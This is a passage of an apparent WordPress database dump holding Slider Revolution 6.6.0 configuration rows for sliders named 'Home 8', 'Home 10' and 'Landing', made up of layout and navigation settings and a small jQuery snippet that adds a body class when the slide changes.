\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"vertical\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":\"\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"left\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"vertical\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"0\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"0\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3010,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(7,'Home 8','home8','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home8\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1300,\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":545,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi7.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2010,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"vertical\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"vertical\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(8,'Home 10','home-10','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home-10\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"parallaxtobottom\",\"transitionDuration\":\"300\",\"delay\":\"2000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1366,\"t\":768,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":924,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi8.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":true,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":true,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":4,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"right\",\"vertical\":\"center\",\"direction\":\"vertical\",\"offsetX\":\"45\",\"offsetY\":\"\",\"align\":\"slider\",\"space\":\"13\",\"hideDelay\":\"1280\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1050\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(9,'Landing','landing','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"landing\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3500\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":426,\"n\":410,\"t\":500,\"m\":400},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#fed3c3\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hide